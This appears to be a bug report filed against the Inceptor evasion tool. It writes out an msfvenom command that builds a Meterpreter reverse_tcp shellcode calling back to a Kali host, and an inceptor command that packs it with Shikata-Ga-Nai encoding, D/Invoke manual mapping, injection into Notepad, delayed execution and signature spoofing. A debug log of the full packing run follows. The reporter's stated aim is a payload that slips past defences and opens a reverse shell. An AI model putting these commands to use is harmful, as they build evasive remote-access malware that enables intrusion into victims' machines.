Describe the bug
I use the command containing "-m dinvoke" to compile the packaged exe, which will cause injection of Notepad exceptions
To Reproduce
my os is windows10 and VS version is VS2022
I use msfvenom to create the raw payload in kali, command as below
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -f raw > a4.raw
the inceptor bypass command is "python donet a4.raw -o demo\xx.exe --sgn --sign -P -m dinvoke --delay 15"
use command "demo.bat xx.exe"
and the inject victim notepad will exit abnormally
But if I remove the options -m dinvoke
, then the final compiled exe can reverse connection to kali successfully.
or if I remove the options -P
, then the final compiled exe can also reverse connection to kali successfully.
Expected behavior
run "demo.bat xx.exe" and the final compiled payload can reverse connection to kali
Debug Info:
- Go to your config.ini file
- In DEBUG, mark all as 1
- Reproduce the bug again
- Paste the output given by the tool
▒ by d3adc0de (@klezVirus)
[DEBUG] Loading module Dinvoke
[DEBUG] Loading module Delay
[+] .Net Artifact Generator Started At 2023-05-29 13:11:56.792864
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
[*] Encoded filename: C:\Users\ll\inceptor\inceptor\temp\tmpjl1x2_0v.raw.sgn
[>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
[>] Encoder Chain: HexEncoder
[>] Shellcode size: 1228
[>] Shellcode Signature: 4cd095380d1813a5d7ce12309e1b7f282cb629cb
[*] Phase 3: Generating source files using CLASSIC-DINVOKE_MANUAL_MAPPING
[>] Phase 3.1: Writing CS file in .\temp\tmpxm7yrsms.cs
[>] Phase 3.2: Compiling and linking dependency files in "DInvoke.dll"
[*] Phase 4: Compiling
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /target:exe /platform:x64 /unsafe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" /res:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" /r:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" "C:\Users\ll\inceptor\inceptor\temp\tmpxm7yrsms.cs"
Microsoft (R) Visual C# Compiler version 4.8.3752.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see
[*] Phase 5: Merging Resources
"C:\Users\ll\inceptor\inceptor\libs\public\ILRepack.exe" /target:exe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe" "C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" "C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"
INFO: IL Repack - Version 2.0.18
INFO: ------------- IL Repack Arguments -------------
/out:C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Processing references
INFO: Processing types
INFO: Merging <Module>
INFO: Merging <Module>
INFO: Processing exported types
INFO: Processing resources
INFO: Fixing references
INFO: Writing output assembly to disk
INFO: Finished in 00:00:00.6446447
[+] Success: packed file stored at C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
[+] File Signature: cadf3da2d2cc537444b9b57d5081116a2981d290
[*] Phase 6: Sign dotnet binary
'"C:\Users\ll\inceptor\inceptor"' 不是内部或外部命令,也不是可运行的程序
[+] Signed with: CarbonCopy
[*] Phase 7: Finalising
[+] Success: file stored at demo\xx.exe
[*] Phase 8: Cleaning up
[+] .Net Artifact Generator Finished At 2023-05-29 13:12:00.463994
